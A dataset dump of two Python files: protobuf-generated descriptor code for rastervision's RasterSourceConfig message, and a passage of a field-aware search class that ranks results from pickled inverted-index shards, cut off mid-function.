text
stringlengths 3
1.05M
|
|---|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: rastervision/protos/raster_source.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import struct_pb2 as google_dot_protobuf_dot_struct__pb2
from rastervision.protos import raster_transformer_pb2 as rastervision_dot_protos_dot_raster__transformer__pb2
from rastervision.protos import vector_source_pb2 as rastervision_dot_protos_dot_vector__source__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='rastervision/protos/raster_source.proto',
package='rv.protos',
syntax='proto2',
serialized_pb=_b('\n\'rastervision/protos/raster_source.proto\x12\trv.protos\x1a\x1cgoogle/protobuf/struct.proto\x1a,rastervision/protos/raster_transformer.proto\x1a\'rastervision/protos/vector_source.proto\"\xf5\x07\n\x12RasterSourceConfig\x12\x13\n\x0bsource_type\x18\x01 \x02(\t\x12\x38\n\x0ctransformers\x18\x02 \x03(\x0b\x32\".rv.protos.RasterTransformerConfig\x12\x15\n\rchannel_order\x18\x03 \x03(\x05\x12\x43\n\rgeotiff_files\x18\x04 \x01(\x0b\x32*.rv.protos.RasterSourceConfig.GeoTiffFilesH\x00\x12=\n\nimage_file\x18\x05 \x01(\x0b\x32\'.rv.protos.RasterSourceConfig.ImageFileH\x00\x12\x41\n\x0cgeojson_file\x18\x06 \x01(\x0b\x32).rv.protos.RasterSourceConfig.GeoJSONFileH\x00\x12\x30\n\rcustom_config\x18\x07 \x01(\x0b\x32\x17.google.protobuf.StructH\x00\x12K\n\x11rasterized_source\x18\x08 \x01(\x0b\x32..rv.protos.RasterSourceConfig.RasterizedSourceH\x00\x1aL\n\x0cGeoTiffFiles\x12\x0c\n\x04uris\x18\x01 \x03(\t\x12\x16\n\x0ex_shift_meters\x18\x02 \x01(\x02\x12\x16\n\x0ey_shift_meters\x18\x03 \x01(\x02\x1a\x18\n\tImageFile\x12\x0b\n\x03uri\x18\x01 \x02(\t\x1a\xf1\x01\n\x10RasterizedSource\x12\x34\n\rvector_source\x18\x01 \x02(\x0b\x32\x1d.rv.protos.VectorSourceConfig\x12\\\n\x12rasterizer_options\x18\x02 \x02(\x0b\x32@.rv.protos.RasterSourceConfig.RasterizedSource.RasterizerOptions\x1aI\n\x11RasterizerOptions\x12\x1b\n\x13\x62\x61\x63kground_class_id\x18\x02 \x02(\x05\x12\x17\n\x0bline_buffer\x18\x03 \x01(\x05:\x02\x31\x35\x1a\xbe\x01\n\x0bGeoJSONFile\x12\x0b\n\x03uri\x18\x01 \x02(\t\x12W\n\x12rasterizer_options\x18\x02 \x02(\x0b\x32;.rv.protos.RasterSourceConfig.GeoJSONFile.RasterizerOptions\x1aI\n\x11RasterizerOptions\x12\x1b\n\x13\x62\x61\x63kground_class_id\x18\x02 \x02(\x05\x12\x17\n\x0bline_buffer\x18\x03 \x01(\x05:\x02\x31\x35\x42\x16\n\x14raster_source_config')
,
dependencies=[google_dot_protobuf_dot_struct__pb2.DESCRIPTOR,rastervision_dot_protos_dot_raster__transformer__pb2.DESCRIPTOR,rastervision_dot_protos_dot_vector__source__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_RASTERSOURCECONFIG_GEOTIFFFILES = _descriptor.Descriptor(
name='GeoTiffFiles',
full_name='rv.protos.RasterSourceConfig.GeoTiffFiles',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='uris', full_name='rv.protos.RasterSourceConfig.GeoTiffFiles.uris', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='x_shift_meters', full_name='rv.protos.RasterSourceConfig.GeoTiffFiles.x_shift_meters', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='y_shift_meters', full_name='rv.protos.RasterSourceConfig.GeoTiffFiles.y_shift_meters', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=622,
serialized_end=698,
)
_RASTERSOURCECONFIG_IMAGEFILE = _descriptor.Descriptor(
name='ImageFile',
full_name='rv.protos.RasterSourceConfig.ImageFile',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='uri', full_name='rv.protos.RasterSourceConfig.ImageFile.uri', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=700,
serialized_end=724,
)
_RASTERSOURCECONFIG_RASTERIZEDSOURCE_RASTERIZEROPTIONS = _descriptor.Descriptor(
name='RasterizerOptions',
full_name='rv.protos.RasterSourceConfig.RasterizedSource.RasterizerOptions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='background_class_id', full_name='rv.protos.RasterSourceConfig.RasterizedSource.RasterizerOptions.background_class_id', index=0,
number=2, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='line_buffer', full_name='rv.protos.RasterSourceConfig.RasterizedSource.RasterizerOptions.line_buffer', index=1,
number=3, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=15,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=895,
serialized_end=968,
)
_RASTERSOURCECONFIG_RASTERIZEDSOURCE = _descriptor.Descriptor(
name='RasterizedSource',
full_name='rv.protos.RasterSourceConfig.RasterizedSource',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='vector_source', full_name='rv.protos.RasterSourceConfig.RasterizedSource.vector_source', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='rasterizer_options', full_name='rv.protos.RasterSourceConfig.RasterizedSource.rasterizer_options', index=1,
number=2, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_RASTERSOURCECONFIG_RASTERIZEDSOURCE_RASTERIZEROPTIONS, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=727,
serialized_end=968,
)
_RASTERSOURCECONFIG_GEOJSONFILE_RASTERIZEROPTIONS = _descriptor.Descriptor(
name='RasterizerOptions',
full_name='rv.protos.RasterSourceConfig.GeoJSONFile.RasterizerOptions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='background_class_id', full_name='rv.protos.RasterSourceConfig.GeoJSONFile.RasterizerOptions.background_class_id', index=0,
number=2, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='line_buffer', full_name='rv.protos.RasterSourceConfig.GeoJSONFile.RasterizerOptions.line_buffer', index=1,
number=3, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=15,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=895,
serialized_end=968,
)
_RASTERSOURCECONFIG_GEOJSONFILE = _descriptor.Descriptor(
name='GeoJSONFile',
full_name='rv.protos.RasterSourceConfig.GeoJSONFile',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='uri', full_name='rv.protos.RasterSourceConfig.GeoJSONFile.uri', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='rasterizer_options', full_name='rv.protos.RasterSourceConfig.GeoJSONFile.rasterizer_options', index=1,
number=2, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_RASTERSOURCECONFIG_GEOJSONFILE_RASTERIZEROPTIONS, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=971,
serialized_end=1161,
)
_RASTERSOURCECONFIG = _descriptor.Descriptor(
name='RasterSourceConfig',
full_name='rv.protos.RasterSourceConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='source_type', full_name='rv.protos.RasterSourceConfig.source_type', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='transformers', full_name='rv.protos.RasterSourceConfig.transformers', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='channel_order', full_name='rv.protos.RasterSourceConfig.channel_order', index=2,
number=3, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='geotiff_files', full_name='rv.protos.RasterSourceConfig.geotiff_files', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='image_file', full_name='rv.protos.RasterSourceConfig.image_file', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='geojson_file', full_name='rv.protos.RasterSourceConfig.geojson_file', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='custom_config', full_name='rv.protos.RasterSourceConfig.custom_config', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='rasterized_source', full_name='rv.protos.RasterSourceConfig.rasterized_source', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_RASTERSOURCECONFIG_GEOTIFFFILES, _RASTERSOURCECONFIG_IMAGEFILE, _RASTERSOURCECONFIG_RASTERIZEDSOURCE, _RASTERSOURCECONFIG_GEOJSONFILE, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='raster_source_config', full_name='rv.protos.RasterSourceConfig.raster_source_config',
index=0, containing_type=None, fields=[]),
],
serialized_start=172,
serialized_end=1185,
)
_RASTERSOURCECONFIG_GEOTIFFFILES.containing_type = _RASTERSOURCECONFIG
_RASTERSOURCECONFIG_IMAGEFILE.containing_type = _RASTERSOURCECONFIG
_RASTERSOURCECONFIG_RASTERIZEDSOURCE_RASTERIZEROPTIONS.containing_type = _RASTERSOURCECONFIG_RASTERIZEDSOURCE
_RASTERSOURCECONFIG_RASTERIZEDSOURCE.fields_by_name['vector_source'].message_type = rastervision_dot_protos_dot_vector__source__pb2._VECTORSOURCECONFIG
_RASTERSOURCECONFIG_RASTERIZEDSOURCE.fields_by_name['rasterizer_options'].message_type = _RASTERSOURCECONFIG_RASTERIZEDSOURCE_RASTERIZEROPTIONS
_RASTERSOURCECONFIG_RASTERIZEDSOURCE.containing_type = _RASTERSOURCECONFIG
_RASTERSOURCECONFIG_GEOJSONFILE_RASTERIZEROPTIONS.containing_type = _RASTERSOURCECONFIG_GEOJSONFILE
_RASTERSOURCECONFIG_GEOJSONFILE.fields_by_name['rasterizer_options'].message_type = _RASTERSOURCECONFIG_GEOJSONFILE_RASTERIZEROPTIONS
_RASTERSOURCECONFIG_GEOJSONFILE.containing_type = _RASTERSOURCECONFIG
_RASTERSOURCECONFIG.fields_by_name['transformers'].message_type = rastervision_dot_protos_dot_raster__transformer__pb2._RASTERTRANSFORMERCONFIG
_RASTERSOURCECONFIG.fields_by_name['geotiff_files'].message_type = _RASTERSOURCECONFIG_GEOTIFFFILES
_RASTERSOURCECONFIG.fields_by_name['image_file'].message_type = _RASTERSOURCECONFIG_IMAGEFILE
_RASTERSOURCECONFIG.fields_by_name['geojson_file'].message_type = _RASTERSOURCECONFIG_GEOJSONFILE
_RASTERSOURCECONFIG.fields_by_name['custom_config'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_RASTERSOURCECONFIG.fields_by_name['rasterized_source'].message_type = _RASTERSOURCECONFIG_RASTERIZEDSOURCE
_RASTERSOURCECONFIG.oneofs_by_name['raster_source_config'].fields.append(
_RASTERSOURCECONFIG.fields_by_name['geotiff_files'])
_RASTERSOURCECONFIG.fields_by_name['geotiff_files'].containing_oneof = _RASTERSOURCECONFIG.oneofs_by_name['raster_source_config']
_RASTERSOURCECONFIG.oneofs_by_name['raster_source_config'].fields.append(
_RASTERSOURCECONFIG.fields_by_name['image_file'])
_RASTERSOURCECONFIG.fields_by_name['image_file'].containing_oneof = _RASTERSOURCECONFIG.oneofs_by_name['raster_source_config']
_RASTERSOURCECONFIG.oneofs_by_name['raster_source_config'].fields.append(
_RASTERSOURCECONFIG.fields_by_name['geojson_file'])
_RASTERSOURCECONFIG.fields_by_name['geojson_file'].containing_oneof = _RASTERSOURCECONFIG.oneofs_by_name['raster_source_config']
_RASTERSOURCECONFIG.oneofs_by_name['raster_source_config'].fields.append(
_RASTERSOURCECONFIG.fields_by_name['custom_config'])
_RASTERSOURCECONFIG.fields_by_name['custom_config'].containing_oneof = _RASTERSOURCECONFIG.oneofs_by_name['raster_source_config']
_RASTERSOURCECONFIG.oneofs_by_name['raster_source_config'].fields.append(
_RASTERSOURCECONFIG.fields_by_name['rasterized_source'])
_RASTERSOURCECONFIG.fields_by_name['rasterized_source'].containing_oneof = _RASTERSOURCECONFIG.oneofs_by_name['raster_source_config']
DESCRIPTOR.message_types_by_name['RasterSourceConfig'] = _RASTERSOURCECONFIG
RasterSourceConfig = _reflection.GeneratedProtocolMessageType('RasterSourceConfig', (_message.Message,), dict(
GeoTiffFiles = _reflection.GeneratedProtocolMessageType('GeoTiffFiles', (_message.Message,), dict(
DESCRIPTOR = _RASTERSOURCECONFIG_GEOTIFFFILES,
__module__ = 'rastervision.protos.raster_source_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.RasterSourceConfig.GeoTiffFiles)
))
,
ImageFile = _reflection.GeneratedProtocolMessageType('ImageFile', (_message.Message,), dict(
DESCRIPTOR = _RASTERSOURCECONFIG_IMAGEFILE,
__module__ = 'rastervision.protos.raster_source_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.RasterSourceConfig.ImageFile)
))
,
RasterizedSource = _reflection.GeneratedProtocolMessageType('RasterizedSource', (_message.Message,), dict(
RasterizerOptions = _reflection.GeneratedProtocolMessageType('RasterizerOptions', (_message.Message,), dict(
DESCRIPTOR = _RASTERSOURCECONFIG_RASTERIZEDSOURCE_RASTERIZEROPTIONS,
__module__ = 'rastervision.protos.raster_source_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.RasterSourceConfig.RasterizedSource.RasterizerOptions)
))
,
DESCRIPTOR = _RASTERSOURCECONFIG_RASTERIZEDSOURCE,
__module__ = 'rastervision.protos.raster_source_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.RasterSourceConfig.RasterizedSource)
))
,
GeoJSONFile = _reflection.GeneratedProtocolMessageType('GeoJSONFile', (_message.Message,), dict(
RasterizerOptions = _reflection.GeneratedProtocolMessageType('RasterizerOptions', (_message.Message,), dict(
DESCRIPTOR = _RASTERSOURCECONFIG_GEOJSONFILE_RASTERIZEROPTIONS,
__module__ = 'rastervision.protos.raster_source_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.RasterSourceConfig.GeoJSONFile.RasterizerOptions)
))
,
DESCRIPTOR = _RASTERSOURCECONFIG_GEOJSONFILE,
__module__ = 'rastervision.protos.raster_source_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.RasterSourceConfig.GeoJSONFile)
))
,
DESCRIPTOR = _RASTERSOURCECONFIG,
__module__ = 'rastervision.protos.raster_source_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.RasterSourceConfig)
))
_sym_db.RegisterMessage(RasterSourceConfig)
_sym_db.RegisterMessage(RasterSourceConfig.GeoTiffFiles)
_sym_db.RegisterMessage(RasterSourceConfig.ImageFile)
_sym_db.RegisterMessage(RasterSourceConfig.RasterizedSource)
_sym_db.RegisterMessage(RasterSourceConfig.RasterizedSource.RasterizerOptions)
_sym_db.RegisterMessage(RasterSourceConfig.GeoJSONFile)
_sym_db.RegisterMessage(RasterSourceConfig.GeoJSONFile.RasterizerOptions)
# @@protoc_insertion_point(module_scope)
|
# KINDS
# -----
# 0 - docID
# 1 - title
# 2 - infobox
# 3 - references
# 4 - category
# 5 - links
# 6 - body
import pickle, os
class search ():
def __init__ (self, path_to_index_file, stemmer, stopwords):
self.path_to_index_file = path_to_index_file
self.stemmer = stemmer
self.stopwords = stopwords
self.weights = [None, 2000, 500, 80, 40, 10, 150]
# self.weights = [None, 2000, 300, 10, 40, 10, 100]
def apply_process (self, lines, query_term):
for line in lines:
j = line[2:line.find('[')]
j = j[:j.find('\'')]
if j == query_term:
return True
return False
def intersection (self, list1, list2):
temp = set (list(zip(*list2))[0])
list3 = [x[0] for x in list1 if x[0] in temp]
return list3
def list_intersection (self, lst1, lst2):
lst3 = [value for value in lst1 if value in lst2]
return lst3
def process_query (self, query):
self.query = query.lower()
self.terms_in_query = self.query.split(' ')
self.terms_in_query = [x.strip() for x in self.terms_in_query]
self.terms_in_query = [self.stemmer.stem(x) for x in self.terms_in_query if not self.stopwords.check_stopword(x)]
self.final_list = []
def field_query (self, query):
fields = [None, 0, 0, 0, 0, 0, 0]
title = None
infobox = None
references = None
category = None
links = None
body = None
final_list = []
lists = []
_of_document_titles = []
if "title" in query:
fields[1] = 1
title = query[query.find("title:")+6:]
if ":" in title:
title = title[:title.find(":")]
# title = title[:title.find(":")]
title = title.split(' ')
if "body" in title:
title.remove("body")
if "infobox" in title:
title.remove("infobox")
if "ref" in title:
title.remove("ref")
if "category" in title:
title.remove("category")
if "links" in title:
title.remove("links")
if "infobox" in query:
fields[1] = 1
infobox = query[query.find("infobox:")+8:]
if ":" in infobox:
infobox = infobox[:infobox.find(":")]
# infobox = infobox[:infobox.find(":")]
infobox = infobox.split(' ')
if "body" in infobox:
infobox.remove("body")
if "title" in infobox:
infobox.remove("title")
if "ref" in infobox:
infobox.remove("ref")
if "category" in infobox:
infobox.remove("category")
if "links" in infobox:
infobox.remove("links")
if "ref" in query:
fields[1] = 1
references = query[query.find("ref:")+4:]
if ":" in references:
references = references[:references.find(":")]
# references = references[:references.find(":")]
references = references.split(' ')
if "body" in references:
references.remove("body")
if "title" in references:
references.remove("title")
if "infobox" in references:
references.remove("infobox")
if "category" in references:
references.remove("category")
if "links" in references:
references.remove("links")
if "category" in query:
fields[1] = 1
category = query[query.find("category:")+9:]
if ":" in category:
category = category[:category.find(":")]
# category = category[:category.find(":")]
category = category.split(' ')
if "body" in category:
category.remove("body")
if "title" in category:
category.remove("title")
if "infobox" in category:
category.remove("infobox")
if "ref" in category:
category.remove("ref")
if "links" in category:
category.remove("links")
if "links" in query:
fields[1] = 1
links = query[query.find("links:")+6:]
if ":" in links:
links = links[:links.find(":")]
links = links.split(' ')
if "body" in links:
links.remove("body")
if "title" in links:
links.remove("title")
if "infobox" in links:
links.remove("infobox")
if "ref" in links:
links.remove("ref")
if "category" in links:
links.remove("category")
if "body" in query:
fields[1] = 1
body = query[query.find("body:")+5:]
if ":" in body:
body = body[:body.find(":")]
body = body.split(' ')
if "links" in body:
body.remove("links")
if "title" in body:
body.remove("title")
if "infobox" in body:
body.remove("infobox")
if "ref" in body:
body.remove("ref")
if "category" in body:
body.remove("category")
print (title)
print (body)
if title is not None:
if len (title) == 1:
index_file_name = os.path.join ('../output/' + 'index_' + str(title[0][0]) + str(title[0][1]))
index_file = open (index_file_name, 'rb')
index = {}
index = pickle.load (index_file)
if title[0] in index:
final_list = index[title[0]]
final_list = [x for x in final_list if x[1] > 0]
final_list.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
if len(final_list) == 0:
final_list = ['.'] * 10
return final_list
else:
final_list = list(zip(*final_list))[0]
else:
posting_lists = []
for term in title:
index_file_name = os.path.join ('../output/' + 'index_' + str(term[0]) + str(term[1]))
index_file = open (index_file_name, 'rb')
index = {}
index = pickle.load (index_file)
if term in index:
temp_list = index[term]
temp_list = [x for x in temp_list if x[1] > 0]
posting_lists.append (temp_list)
posting_lists.sort (key=len)
number_of_posting_lists = len(posting_lists)
if number_of_posting_lists > 0:
self.final_list = self.intersection (posting_lists[0], posting_lists[1])
else:
self.final_list = posting_lists
for i in range (1, number_of_posting_lists-1):
if len (self.final_list) < len (posting_lists[i]):
self.final_list = self.intersection (self.final_list, posting_lists[i])
else:
self.final_list = self.intersection (posting_lists[i], self.final_list)
if len(final_list) > 0:
lists.append ([x for x in final_list])
lists.append ([x for x in final_list])
final_list = []
if infobox is not None:
if len (infobox) == 1:
index_file_name = os.path.join ('../output/' + 'index_' + str(infobox[0][0]) + str(infobox[0][1]))
index_file = open (index_file_name, 'rb')
index = {}
index = pickle.load (index_file)
if infobox[0] in index:
final_list = index[infobox[0]]
final_list = [x for x in final_list if x[2] > 0]
final_list.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
if len(final_list) == 0:
final_list = ['.'] * 10
return final_list
else:
final_list = list(zip(*final_list))[0]
else:
posting_lists = []
for term in infobox:
index_file_name = os.path.join ('../output/' + 'index_' + str(term[0]) + str(term[1]))
index_file = open (index_file_name, 'rb')
index = {}
index = pickle.load (index_file)
if term in index:
temp_list = index[term]
temp_list = [x for x in temp_list if x[2] > 0]
posting_lists.append (temp_list)
posting_lists.sort (key=len)
number_of_posting_lists = len(posting_lists)
if number_of_posting_lists > 0:
self.final_list = self.intersection (posting_lists[0], posting_lists[1])
else:
self.final_list = posting_lists
for i in range (1, number_of_posting_lists-1):
if len (self.final_list) < len (posting_lists[i]):
self.final_list = self.intersection (self.final_list, posting_lists[i])
else:
self.final_list = self.intersection (posting_lists[i], self.final_list)
if len(final_list) > 0:
lists.append ([x for x in final_list])
lists.append ([x for x in final_list])
final_list = []
if references is not None:
if len (references) == 1:
index_file_name = os.path.join ('../output/' + 'index_' + str(references[0][0]) + str(references[0][1]))
index_file = open (index_file_name, 'rb')
index = {}
index = pickle.load (index_file)
if references[0] in index:
final_list = index[references[0]]
final_list = [x for x in final_list if x[3] > 0]
final_list.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
if len(final_list) == 0:
final_list = ['.'] * 10
return final_list
else:
final_list = list(zip(*final_list))[0]
else:
posting_lists = []
for term in references:
index_file_name = os.path.join ('../output/' + 'index_' + str(term[0]) + str(term[1]))
index_file = open (index_file_name, 'rb')
index = {}
index = pickle.load (index_file)
if term in index:
temp_list = index[term]
temp_list = [x for x in temp_list if x[3] > 0]
posting_lists.append (temp_list)
posting_lists.sort (key=len)
number_of_posting_lists = len(posting_lists)
if number_of_posting_lists > 0:
self.final_list = self.intersection (posting_lists[0], posting_lists[1])
else:
self.final_list = posting_lists
for i in range (1, number_of_posting_lists-1):
if len (self.final_list) < len (posting_lists[i]):
self.final_list = self.intersection (self.final_list, posting_lists[i])
else:
self.final_list = self.intersection (posting_lists[i], self.final_list)
if len(final_list) > 0:
lists.append ([x for x in final_list])
lists.append ([x for x in final_list])
final_list = []
if category is not None:
if len (category) == 1:
index_file_name = os.path.join ('../output/' + 'index_' + str(category[0][0]) + str(category[0][1]))
index_file = open (index_file_name, 'rb')
index = {}
index = pickle.load (index_file)
if category[0] in index:
final_list = index[category[0]]
final_list = [x for x in final_list if x[4] > 0]
final_list.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
if len(final_list) == 0:
final_list = ['.'] * 10
return final_list
else:
final_list = list(zip(*final_list))[0]
else:
posting_lists = []
for term in category:
index_file_name = os.path.join ('../output/' + 'index_' + str(term[0]) + str(term[1]))
index_file = open (index_file_name, 'rb')
index = {}
index = pickle.load (index_file)
if term in index:
temp_list = index[term]
temp_list = [x for x in temp_list if x[4] > 0]
posting_lists.append (temp_list)
posting_lists.sort (key=len)
number_of_posting_lists = len(posting_lists)
if number_of_posting_lists > 0:
self.final_list = self.intersection (posting_lists[0], posting_lists[1])
else:
self.final_list = posting_lists
for i in range (1, number_of_posting_lists-1):
if len (self.final_list) < len (posting_lists[i]):
self.final_list = self.intersection (self.final_list, posting_lists[i])
else:
self.final_list = self.intersection (posting_lists[i], self.final_list)
if len(final_list) > 0:
lists.append ([x for x in final_list])
lists.append ([x for x in final_list])
final_list = []
if links is not None:
if len (links) == 1:
index_file_name = os.path.join ('../output/' + 'index_' + str(links[0][0]) + str(links[0][1]))
index_file = open (index_file_name, 'rb')
index = {}
index = pickle.load (index_file)
if links[0] in index:
final_list = index[links[0]]
final_list = [x for x in final_list if x[5] > 0]
final_list.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
if len(final_list) == 0:
final_list = ['.'] * 10
return final_list
else:
final_list = list(zip(*final_list))[0]
else:
posting_lists = []
for term in links:
index_file_name = os.path.join ('../output/' + 'index_' + str(term[0]) + str(term[1]))
index_file = open (index_file_name, 'rb')
index = {}
index = pickle.load (index_file)
if term in index:
temp_list = index[term]
temp_list = [x for x in temp_list if x[5] > 0]
posting_lists.append (temp_list)
posting_lists.sort (key=len)
number_of_posting_lists = len(posting_lists)
if number_of_posting_lists > 0:
self.final_list = self.intersection (posting_lists[0], posting_lists[1])
else:
self.final_list = posting_lists
for i in range (1, number_of_posting_lists-1):
if len (self.final_list) < len (posting_lists[i]):
self.final_list = self.intersection (self.final_list, posting_lists[i])
else:
self.final_list = self.intersection (posting_lists[i], self.final_list)
if len(final_list) > 0:
lists.append ([x for x in final_list])
lists.append ([x for x in final_list])
final_list = []
if body is not None:
if len (body) == 1:
index_file_name = os.path.join ('../output/' + 'index_' + str(body[0][0]) + str(body[0][1]))
index_file = open (index_file_name, 'rb')
index = {}
index = pickle.load (index_file)
if body[0] in index:
final_list = index[body[0]]
final_list = [x for x in final_list if x[6] > 0]
final_list.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
final_list = final_list[:10]
if len(final_list) == 0:
final_list = ['.'] * 10
return final_list
else:
final_list = list(zip(*final_list))[0]
else:
posting_lists = []
for term in body:
index_file_name = os.path.join ('../output/' + 'index_' + str(term[0]) + str(term[1]))
index_file = open (index_file_name, 'rb')
index = {}
index = pickle.load (index_file)
if term in index:
temp_list = index[term]
temp_list = [x for x in temp_list if x[6] > 0]
posting_lists.append (temp_list)
posting_lists.sort (key=len)
number_of_posting_lists = len(posting_lists)
if number_of_posting_lists > 0:
self.final_list = self.intersection (posting_lists[0], posting_lists[1])
else:
self.final_list = posting_lists
for i in range (1, number_of_posting_lists-1):
if len (self.final_list) < len (posting_lists[i]):
self.final_list = self.intersection (self.final_list, posting_lists[i])
else:
